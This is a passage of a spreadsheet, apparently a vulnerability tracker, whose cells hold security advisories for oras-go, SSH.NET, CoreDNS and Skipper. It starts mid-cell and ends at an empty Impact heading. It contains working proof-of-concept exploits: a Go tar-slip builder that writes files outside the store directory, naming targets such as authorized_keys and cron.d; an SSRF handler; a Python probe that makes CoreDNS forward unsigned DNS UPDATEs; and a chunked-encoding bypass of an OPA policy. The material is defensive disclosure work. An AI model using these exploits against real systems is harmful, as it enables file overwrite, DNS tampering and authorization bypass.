        fmt.Println("[*] file.Store working dir:", workDir)
        // Target path the attacker wants to write, OUTSIDE workDir.
        // (Could be ~/.ssh/authorized_keys, ~/.bashrc, /etc/cron.d/x, etc.;
        // a temp path keeps the demo self-contained.)
        outsidePath := filepath.Join(os.TempDir(), "oras-PWNED")
        _ = os.Remove(outsidePath)
        defer os.Remove(outsidePath)
        fmt.Println("[*] attacker target (outside workDir):", outsidePath)
        // The layer's AnnotationTitle. extractTarDirectory uses this as both the
        // in-tar prefix and the on-disk subdir under workDir.
        const title = "out"
        baseAbs := filepath.Join(workDir, title)
        // N nested dirs + a symlink "up" -&gt; N*"../" so that after the kernel
        // follows "up" (landing at baseAbs) the remaining N lexical ".."
        // components climb from baseAbs to "/". N must be &gt;= depth(baseAbs).
        depth := len(strings.Split(strings.Trim(filepath.ToSlash(baseAbs), "/"), "/"))
        fmt.Printf("[*] baseAbs depth = %d, building %d nested dirs\n", depth, depth)
        gz, dgst, size, err := buildMaliciousLayer(title, depth, outsidePath)
        if err != nil {
                return err
        }
        // Descriptor exactly as it would appear in a manifest's "layers" array.
        desc := ocispec.Descriptor{
                MediaType: "application/vnd.oci.image.layer.v1.tar+gzip",
                Digest:    dgst,
                Size:      size,
                Annotations: map[string]string{
                        ocispec.AnnotationTitle: title,
                        file.AnnotationUnpack:   "true",
                },
        }
        // Victim creates a file store with default settings (path traversal DISALLOWED).
        store, err := file.New(workDir)
        if err != nil {
                return err
        }
        defer store.Close()
        fmt.Println("[*] store.AllowPathTraversalOnWrite =", store.AllowPathTraversalOnWrite)
        // This is exactly what oras.Copy() invokes per layer.
        if err := store.Push(ctx, desc, bytes.NewReader(gz)); err != nil {
                return fmt.Errorf("Push: %w", err)
        }
        // Check whether the out-of-tree file was written.
        if data, err := os.ReadFile(outsidePath); err == nil {
                rel, _ := filepath.Rel(workDir, outsidePath)
                fmt.Printf("\n[!] BYPASS: wrote %q to %s\n", string(data), outsidePath)
                fmt.Printf("[!] relative to workDir: %s\n", rel)
                fmt.Println("[!] PATH TRAVERSAL CONFIRMED - file written OUTSIDE file.Store working dir")
                return nil
        }
        fmt.Println("\n[-] no escape (file not created at", outsidePath, ")")
        return nil
}
// buildMaliciousLayer builds a tar.gz that, when extracted by
// content/file.extractTarDirectory under &lt;workDir&gt;/&lt;title&gt;, writes to outsidePath.
func buildMaliciousLayer(title string, depth int, outsidePath string) ([]byte, digest.Digest, int64, error) {
        var buf bytes.Buffer
        gzw := gzip.NewWriter(&amp;buf)
        tw := tar.NewWriter(gzw)
        // 1. Nested directories: title/d0/d1/.../d{depth-1}
        dirs := make([]string, depth)
        for i := 0; i &lt; depth; i++ {
                dirs[i] = fmt.Sprintf("d%d", i)
        }
        for i := 1; i &lt;= depth; i++ {
                name := title + "/" + strings.Join(dirs[:i], "/")
                if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeDir, Name: name, Mode: 0o755}); err != nil {
                        return nil, "", 0, err
                }
        }
        // 2. "up" symlink at the bottom, pointing back to baseAbs via depth*"../".
        //    Lexically AND on disk this resolves to baseAbs - passes ensureLinkPath.
        upName := title + "/" + strings.Join(dirs, "/") + "/up"
        upTarget := strings.Repeat("../", depth-1) + ".."
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeSymlink, Name: upName, Linkname: upTarget, Mode: 0o777}); err != nil {
                return nil, "", 0, err
        }
        // 3. "escape" symlink at title/escape.
        //    Target = d0/.../d{N-1}/up/../.. (N times) /&lt;outsidePath&gt;
        //    LEXICAL clean: the N ".." cancel "up" + (N-1) dirs, leaving
        //      d0/&lt;outsidePath&gt;  - INSIDE baseAbs, so ensureLinkPath accepts it.
        //    KERNEL: d0/.../up follows the symlink to baseAbs, then N*".."
        //      climbs to "/", then appends outsidePath.
        dots := strings.Repeat("../", depth-1) + ".."
        escapeTarget := strings.Join(dirs, "/") + "/up/" + dots + outsidePath
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeSymlink, Name: title + "/escape", Linkname: escapeTarget, Mode: 0o777}); err != nil {
                return nil, "", 0, err
        }
        // 4. Regular file entry at title/escape - same path as the symlink.
        //    resolveRelToBase("escape") has dir=="." so the per-component Lstat
        //    loop never runs; writeFile opens with O_CREATE|O_TRUNC (no
        //    O_NOFOLLOW) and writes through the symlink to outsidePath.
        payload := []byte("PWNED-BY-ORAS-TARSLIP")
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeReg, Name: title + "/escape", Mode: 0o644, Size: int64(len(payload))}); err != nil {
                return nil, "", 0, err
        }
        if _, err := tw.Write(payload); err != nil {
                return nil, "", 0, err
        }
        if err := tw.Close(); err != nil {
                return nil, "", 0, err
        }
        if err := gzw.Close(); err != nil {
                return nil, "", 0, err
        }
        data := buf.Bytes()
        return data, digest.FromBytes(data), int64(len(data)), nil
}
```
Expected output (paths vary):
```
[*] file.Store working dir: /tmp/oras-victim-209731351
[*] attacker target (outside workDir): /tmp/oras-PWNED
[*] baseAbs depth = 3, building 3 nested dirs
[*] store.AllowPathTraversalOnWrite = false
[!] BYPASS: wrote "PWNED-BY-ORAS-TARSLIP" to /tmp/oras-PWNED
[!] relative to workDir: ../oras-PWNED
[!] PATH TRAVERSAL CONFIRMED - file written OUTSIDE file.Store working dir
```
### Impact
**Who is affected:** Any application that pulls or pushes OCI artifacts from an untrusted or attacker-influenced source into a `content/file.Store` — e.g. `oras.Copy(ctx, remoteRepo, ref, file.New(dir), ref, opts)`, the documented primary use of the file store — with default settings (`AllowPathTraversalOnWrite=false`, `SkipUnpack=false`). Downstream consumers include the ORAS CLI (`oras pull` to a directory) and tools built on oras-go that materialise artifact contents on disk.
**What the attacker gains:** Arbitrary file create/overwrite anywhere writable by the pulling process. Practical escalations include overwriting `~/.ssh/authorized_keys`, `~/.bashrc`/`~/.profile`, Git hooks, or (when running as root, e.g. in CI or a controller) `/etc/cron.d/*` or binaries on `$PATH` — i.e. remote code execution on the victim host.
**Preconditions / reachability:** No local preconditions beyond pulling an attacker-controlled artifact; the attacker does **not** need any pre-existing symlink in the victim's working directory (unlike GHSA-8xwf-rjm4-xvhv / CVE-2026-50162, which this issue is distinct from). The attack is delivered over the network via a registry the victim pulls from; no authentication to the victim is required. User interaction is limited to the victim choosing to pull the artifact (`UI:R`).</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85731</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85732</t>
        </is>
      </c>
      <c r="D91" s="5" t="inlineStr"/>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>go:oras.land/oras-go/v2</t>
        </is>
      </c>
      <c r="M91" s="5" t="inlineStr">
        <is>
          <t>2.6.2</t>
        </is>
      </c>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr"/>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>## Summary
oras-go's pagination helper `parseLink()` in `registry/remote/utils.go` follows the `Link` response header from a registry without validating the URL's host or scheme. When a malicious registry returns a `Link` header containing an absolute URL pointing to an arbitrary host (e.g., a cloud metadata endpoint), the client makes GET requests to that host from the victim's network.
This affects all pagination-based listing operations: Tags, Referrers, and Repositories (catalog).
## Root Cause
`parseLink()` at `registry/remote/utils.go:54` calls `resp.Request.URL.Parse(link)` which, for absolute URLs, returns the absolute URL unchanged. The result is passed directly to the next pagination loop iteration where `http.NewRequestWithContext()` creates a GET request to the attacker-specified URL. No host comparison, scheme validation, or IP filtering exists between `parseLink` output and the HTTP request.
## Affected Code Paths
- `registry/remote/repository.go:Tags()` calls `parseLink()` for next page URL
- `registry/remote/repository.go:Referrers()` calls `parseLink()` for next page URL
- `registry/remote/registry.go:Repositories()` calls `parseLink()` for next page URL
## Impact
**Blind SSRF from the victim's network.** A malicious registry operator can force any oras-go client that lists tags, referrers, or repositories to issue GET requests to arbitrary internal endpoints:
- Cloud instance metadata endpoints for service discovery and IAM role enumeration
- Internal HTTP services for port scanning and triggering side effects
- If the victim's credential store maps credentials for the SSRF target host, those credentials are attached to the request (auth.Client looks up creds by request host)
The attacker cannot read the response body (it's parsed as JSON and fails), making this a blind SSRF. However, timing and error differences can confirm internal service existence.
## Attack Chain
1. Victim calls `repo.Tags()` / `repo.Referrers()` / `registry.Repositories()` against attacker-controlled registry
2. Registry returns a valid first page + malicious Link header pointing to an internal endpoint
3. `parseLink()` extracts the absolute URL with zero validation
4. Pagination loop makes GET request to the internal endpoint from victim's network
## PoC
&lt;details&gt;
&lt;summary&gt;Expand PoC&lt;/summary&gt;
```go
// Malicious registry handler for /v2/repo/tags/list:
func handler(w http.ResponseWriter, r *http.Request) {
    // Link header points to cloud metadata or internal service
    w.Header().Set("Link", `&lt;http://internal-service:8080/admin&gt;; rel="next"`)
    w.Header().Set("Content-Type", "application/json")
    json.NewEncoder(w).Encode(map[string][]string{"tags": {"v1"}})
}
// Victim code:
repo, _ := remote.NewRepository("attacker-registry.io/repo")
repo.Tags(ctx, "", func(tags []string) error { return nil })
// Result: GET http://internal-service:8080/admin is made from victim's network
```
&lt;/details&gt;
## Suggested Fix
Validate that the URL returned by `parseLink()` has the same host and scheme as the original request before using it for the next pagination request. Reject cross-host or scheme-downgrade URLs.
Reported by **zx (Jace)**</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85732</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85756</t>
        </is>
      </c>
      <c r="D92" s="5" t="inlineStr"/>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>nuget:SSH.NET</t>
        </is>
      </c>
      <c r="M92" s="5" t="inlineStr">
        <is>
          <t>2026.0.0</t>
        </is>
      </c>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr"/>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>## Summary
Default SCP remote-path handling places caller-supplied paths into the command that runs scp on the server. On a shell-based server that command is interpreted by a shell, so an attacker-influenced path that is not quoted to suit that shell can execute as a command as the authenticated SSH user. SSH.NET provides `ScpClient.RemotePathTransformation` to control escaping behaviour (defaulting to `RemotePathTransformation.DoubleQuote`) but cannot guarantee safety for arbitrary remote command interpreters. This is inherent to running scp over a remote shell (cf. CVE-2020-15778).
## Impact
Command execution on the SSH server as the authenticated SSH user, when an application passes an attacker-influenced remote path to ScpClient against a shell-based server.
Exploitation depends on conditions beyond the attacker's control: the remote server must be shell-based, and the attacker-influenced path must be crafted to defeat the quoting applied by the transformation in effect — that is, to use metacharacters that it does not neutralise (for example $(...) or backticks, which survive the default double-quoting on a POSIX shell). A path that does not meet these escaping rules, or a non-shell-based server, does not result in command execution.
## Remediation
The fixed release obsoletes the constructors that silently defaulted the path transformation and adds constructors that require an explicit `IRemotePathTransformation`, so callers are required to choose one that suits their server and trust environment. For POSIX shells, the library provides `RemotePathTransformation.ShellQuote`. The legacy default (`RemotePathTransformation.DoubleQuote`) is unchanged for backwards compatibility. SCP is considered legacy and SFTP, which does not involve a remote shell, is recommended where possible (via `SftpClient`).</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85756</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D93" s="5" t="inlineStr"/>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M93" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr"/>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>### Summary
CoreDNS accepted [RFC 2136](https://datatracker.ietf.org/doc/html/rfc2136) UPDATE messages over DoH, DoH3, DoQ, and DNS-over-gRPC, then allowed the `proxy`/`forward` plugin to send them unchanged to an upstream DNS server. UDP, TCP, and DoT rejected the same opcode before plugin dispatch.
If an update-capable upstream trusts CoreDNS's source address or authenticated connection instead of requiring end-to-end TSIG, an unauthenticated client can use CoreDNS to add, replace, or delete DNS records.
### Details
The affected listeners called `dns.Msg.Unpack` without the request policy used by the UDP/TCP server:
- [DoH and DoH3](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155)
- [DoQ](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219)
- [DNS-over-gRPC](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184)
CoreDNS routed the message using its Zone question without checking the opcode. [`forward`](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/forward/forward.go#L113-L118) then passed the original message to the [upstream](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/proxy/connect.go#L150-L167).
By contrast, [`dns.DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) allows only QUERY and NOTIFY. The fix applies that policy to the raw header via [`dnsutil.UnpackRequest`](https://github.com/coredns/coredns/blob/530b0a5ff2ad68cc0421f10dd93568945cc671c9/plugin/pkg/dnsutil/message.go#L13-L23) before any affected transport dispatches the request.
### PoC
The reproducer starts a standard-library synthetic DNS upstream on loopback, sends an unsigned UPDATE over DoH, and reports whether the upstream received the record. It supports both UDP and TCP because the `forward` plugin may select either transport. It does not contact or modify a real authoritative server.
Clone the repository and build the server:
```bash
git clone git@github.com:coredns/coredns.git
cd coredns
git checkout d5e54040ffab9a5c12c6de27b66f59f62b385195 # latest pre-fix commit from main
go build -tags=grpcnotrace -o coredns .
```
Save this as `Corefile.poc`:
```text
https://.:8053 {
    bind 127.0.0.1
    tls plugin/tls/test_cert.pem plugin/tls/test_key.pem
    forward . 127.0.0.1:15354
}
```
Save this as `poc.py`:
```python
#!/usr/bin/env python3
import argparse
import http.client
import queue
import socket
import ssl
import struct
import threading
OPCODE_UPDATE = 5
TYPE_A = 1
CLASS_IN = 1
def encode_name(name):
    return b"".join(bytes((len(label),)) + label.encode() for label in name.rstrip(".").split(".")) + b"\x00"
def update_message():
    zone = encode_name("example.com.") + struct.pack("!HH", 6, CLASS_IN)
    update = (
        encode_name("foo.example.com.")
        + struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4)
        + socket.inet_aton("192.0.2.123")
    )
    header = struct.pack("!HHHHHH", 0x1234, OPCODE_UPDATE &lt;&lt; 11, 1, 0, 1, 0)
    return header + zone + update
def read_name(message, offset):
    labels = []
    end = None
    seen = set()
    while True:
        if offset &gt;= len(message) or offset in seen:
            raise ValueError("invalid DNS name")
        seen.add(offset)
        length = message[offset]
        if length &amp; 0xC0 == 0xC0:
            if offset + 1 &gt;= len(message):
                raise ValueError("truncated compression pointer")
            if end is None:
                end = offset + 2
            offset = ((length &amp; 0x3F) &lt;&lt; 8) | message[offset + 1]
            continue
        offset += 1
        if length == 0:
            return ".".join(labels) + ".", end if end is not None else offset
        if length &amp; 0xC0 or offset + length &gt; len(message):
            raise ValueError("invalid DNS label")
        labels.append(message[offset : offset + length].decode("ascii"))
        offset += length
def question_end(message, count):
    offset = 12
    for _ in range(count):
        _, offset = read_name(message, offset)
        offset += 4
        if offset &gt; len(message):
            raise ValueError("truncated question")
    return offset
def parse_update(message):
    _, flags, qdcount, _, nscount, _ = struct.unpack_from("!HHHHHH", message)
    if (flags &gt;&gt; 11) &amp; 0xF != OPCODE_UPDATE or qdcount != 1 or nscount &lt; 1:
        return None
    offset = question_end(message, qdcount)
    name, offset = read_name(message, offset)
    rrtype, rrclass, ttl, rdlength = struct.unpack_from("!HHIH", message, offset)
    offset += 10
    rdata = message[offset : offset + rdlength]
    if rrtype != TYPE_A or rrclass != CLASS_IN or len(rdata) != 4:
        return None
    return name, ttl, socket.inet_ntoa(rdata)
def response_for(message):
    ident, flags, qdcount, _, _, _ = struct.unpack_from("!HHHHHH", message)
    end = question_end(message, qdcount)
    response_flags = flags | 0x8000
    return struct.pack("!HHHHHH", ident, response_flags, qdcount, 0, 0, 0) + message[12:end]
def handle_message(message, peer, received):
    try:
        update = parse_update(message)
        response = response_for(message)
    except (ValueError, struct.error):
        return None
    if update is not None:
        received.put((peer, update))
    return response
def serve_udp(sock, received, stopped):
    while not stopped.is_set():
        try:
            message, peer = sock.recvfrom(65535)
        except socket.timeout:
            continue
        except OSError:
            return
        response = handle_message(message, peer, received)
        if response is not None:
            sock.sendto(response, peer)
def recv_exact(connection, size, stopped):
    data = bytearray()
    while len(data) &lt; size and not stopped.is_set():
        try:
            chunk = connection.recv(size - len(data))
        except socket.timeout:
            continue
        if not chunk:
            return None
        data.extend(chunk)
    return bytes(data) if len(data) == size else None
def serve_tcp(sock, received, stopped):
    while not stopped.is_set():
        try:
            connection, peer = sock.accept()
        except socket.timeout:
            continue
        except OSError:
            return
        with connection:
            connection.settimeout(0.1)
            while not stopped.is_set():
                length = recv_exact(connection, 2, stopped)
                if length is None:
                    break
                message = recv_exact(connection, struct.unpack("!H", length)[0], stopped)
                if message is None:
                    break
                response = handle_message(message, peer, received)
                if response is not None:
                    connection.sendall(struct.pack("!H", len(response)) + response)
def send_doh(host, port, payload, timeout):
    context = ssl._create_unverified_context()
    connection = http.client.HTTPSConnection(host, port, timeout=timeout, context=context)
    try:
        connection.request(
            "POST",
            "/dns-query",
            body=payload,
            headers={"Content-Type": "application/dns-message"},
        )
        response = connection.getresponse()
        body = response.read()
        return response.status, len(body)
    finally:
        connection.close()
def main():
    parser = argparse.ArgumentParser(description="Probe whether CoreDNS forwards RFC 2136 UPDATE over DoH")
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", type=int, default=8053)
    parser.add_argument("--upstream-host", default="127.0.0.1")
    parser.add_argument("--upstream-port", type=int, default=15354)
    parser.add_argument("--timeout", type=float, default=2.0)
    parser.add_argument("--expect", choices=("forwarded", "blocked", "either"), default="either")
    args = parser.parse_args()
    received = queue.Queue()
    stopped = threading.Event()
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.settimeout(0.1)
    udp_sock.bind((args.upstream_host, args.upstream_port))
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    tcp_sock.settimeout(0.1)
    tcp_sock.bind((args.upstream_host, args.upstream_port))
    tcp_sock.listen()
    threads = [
        threading.Thread(target=serve_udp, args=(udp_sock, received, stopped), daemon=True),
        threading.Thread(target=serve_tcp, args=(tcp_sock, received, stopped), daemon=True),
    ]
    for thread in threads:
        thread.start()
    payload = update_message()
    try:
        status, response_bytes = send_doh(args.host, args.port, payload, args.timeout)
        try:
            peer, update = received.get(timeout=args.timeout)
        except queue.Empty:
            peer = update = None
    finally:
        stopped.set()
        udp_sock.close()
        tcp_sock.close()
        for thread in threads:
            thread.join(timeout=1)
    print("payload=%d opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123" % len(payload))
    print("http_status=%d response_bytes=%d" % (status, response_bytes))
    if update is None:
        result = "blocked"
        print("upstream_received_update=false")
    else:
        result = "forwarded"
        name, ttl, address = update
        print("upstream_received_update=true source=%s:%d" % peer)
        print("upstream_record=%s %d IN A %s" % (name, ttl, address))
    print("result=%s" % result)
    if args.expect != "either" and args.expect != result:
        raise SystemExit("expected %s, got %s" % (args.expect, result))
if __name__ == "__main__":
    main()
```
Start the vulnerable revision:
```sh
./coredns -conf Corefile.poc
```
In a second terminal, run the probe:
```console
$ python3 poc.py --expect forwarded
payload=60 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=200 response_bytes=29
upstream_received_update=true source=127.0.0.1:52391
upstream_record=foo.example.com. 300 IN A 192.0.2.123
result=forwarded
```
The ephemeral source port varies. The output confirms that the upstream saw the complete UPDATE as a request originating from CoreDNS.
For comparison, build and start CoreDNS with the fix:
```sh
git checkout 530b0a5ff2ad68cc0421f10dd93568945cc671c9 # fix commit from main
go build -tags=grpcnotrace -o coredns-fixed .
./coredns-fixed -conf Corefile.poc
```
The same probe is rejected before reaching the synthetic upstream:
```console
$ python3 poc.py --expect blocked
payload=62 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=400 response_bytes=16
upstream_received_update=false
result=blocked
```
### Impact
Exploitation requires all of the following:
- an attacker can reach a CoreDNS DoH, DoH3, DoQ, or DNS-over-gRPC listener
- the selected `proxy`/`forward` target accepts RFC 2136 UPDATE
- the upstream trusts CoreDNS's source address or connection and does not require an attacker-unknown TSIG
The upstream sees the UPDATE as originating from CoreDNS. A successful attack can redirect traffic, take over names, alter mail routing, or disrupt the writable zone. Requiring and validating end-to-end TSIG prevents the demonstrated attack.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D94" s="5" t="inlineStr"/>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr">
        <is>
          <t>go:github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="M94" s="5" t="inlineStr">
        <is>
          <t>0.27.37</t>
        </is>
      </c>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr"/>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>- **Affected component:** `filters/openpolicyagent/openpolicyagent.go` → `ExtractHttpBodyOptionally`; combined with `github.com/open-policy-agent/opa-envoy-plugin` `envoyauth/request.go` → `getParsedBody` / `checkIfHTTPBodyTruncated`. Filter: `opaAuthorizeRequestWithBody`.
- **Affected versions:** `&lt;= 0.27.33` (current HEAD `e7d7014c`). The `truncated_body` mitigation was introduced/recommended in v0.27.26 (advisory GHSA-8qqm-fp2q-v734) and remains bypassable.
- **Fix chain being audited:** CVE-2026-50197 (GHSA-659f-rgp5-w4wf, commit `3152f3b0`) → GHSA-8qqm-fp2q-v734 (docs + code, commit `1be950cd` #4126, v0.27.26). This finding is the third, still-open variant.
## Summary
Skipper's `opaAuthorizeRequestWithBody` filter authorizes requests by handing the (bounded) request body to Open Policy Agent. When a body exceeds `-open-policy-agent-max-request-body-size` (default 1 MB), Skipper truncates it before OPA sees it. Advisory **GHSA-8qqm-fp2q-v734** established that deny-on-presence / body-inspecting policies fail OPEN on oversized bodies, and its remediation instructs policy authors to **guard on `input.attributes.request.http.truncated_body`** (implemented as the top-level `input.truncated_body`):
```rego
default allow := false
allow if {
    input.truncated_body == false
    # ... body-based conditions
}
```
That mitigation is itself incomplete. The `truncated_body` flag is computed by the OPA envoy plugin **only when a `content-length` header is present**. A request sent with `Transfer-Encoding: chunked` (HTTP/1.1) or over HTTP/2 carries **no `content-length`**, so `truncated_body` is left `false` even though Skipper truncated the body. The mitigated policy therefore evaluates `input.truncated_body == false` as *true* and **ALLOWS** the request, while the **full, un-inspected oversized payload is forwarded to the upstream** (Skipper's `bufferedBodyReader` streams the buffered prefix and then continues draining the original body).
The transport that defeats the mitigation — chunked / HTTP-2 without Content-Length — is the **exact transport class the original CVE-2026-50197 was about**; the GHSA-8qqm fix closed the declared-Content-Length variant and its positive-control test only exercised *small* chunked bodies, never *oversized* chunked bodies.
## Root cause
`opa-envoy-plugin/envoyauth/request.go`:
```go
func getParsedBody(...) (any, bool, error) {
    if val, ok := headers["content-type"]; ok {
        if strings.Contains(val, "application/json") {
            ...
            if val, ok := headers["content-length"]; ok {          // &lt;-- only path that sets truncation
                truncated, err := checkIfHTTPBodyTruncated(val, int64(len(body)))
                ...
                if truncated { return nil, true, nil }
            }
            ...
        } else if ... "application/x-www-form-urlencoded" { /* same content-length gate */ }
          else if ... "multipart/form-data"            { /* same content-length gate */ }
    }
    return data, false, nil     // &lt;-- no content-length  ==&gt; truncated_body = false
}
func checkIfHTTPBodyTruncated(contentLength string, bodyLength int64) (bool, error) {
    cl, _ := strconv.ParseInt(contentLength, 10, 64)
    if cl != -1 &amp;&amp; cl &gt; bodyLength { return true, nil }
    return false, nil
}
```
Truncation can only ever be signalled by comparing `content-length` against the received body length. With chunked/HTTP-2 there is no `content-length`, so the comparison is skipped and `truncated_body` is reported `false`. Skipper (`ExtractHttpBodyOptionally`) meanwhile *does* truncate the chunked body to `maxBodyBytes` (it sets `expectedSize = maxBodyBytes` when `req.ContentLength &lt; 0`), producing the exact divergence: OPA is told "not truncated", but the body was truncated, and the backend receives the whole thing.
## Reachability
1. Deployment runs `opaAuthorizeRequestWithBody` with a body-inspecting policy that follows the GHSA-8qqm mitigation (`allow if input.truncated_body == false`). This is the maintainer-recommended configuration (advisory + v0.27.26 docs).
2. Attacker sends a request whose body exceeds `max-request-body-size` using `Transfer-Encoding: chunked` (or HTTP/2). No `content-length` header is present.
3. `ExtractHttpBodyOptionally` reads/truncates the body to `maxBodyBytes`; `rawBody` is the truncated prefix.
4. `AdaptToExtAuthRequest` forwards the lowercased headers (no `content-length`) and the truncated `RawBody` to OPA.
5. `getParsedBody` finds no `content-length` → `truncated_body = false`; for a non-parsed content-type it also returns `parsed_body = null` with no error.
6. Policy: `input.truncated_body == false` is satisfied → `allow = true`.
7. Skipper forwards the request; `bufferedBodyReader.Read` serves the buffered prefix and then continues reading the original `req.Body`, delivering the **full oversized payload** to the upstream.
Every guard on the path is accounted for: the only "guard" is `truncated_body`, and it is defeated by omitting `content-length`.
## Impact
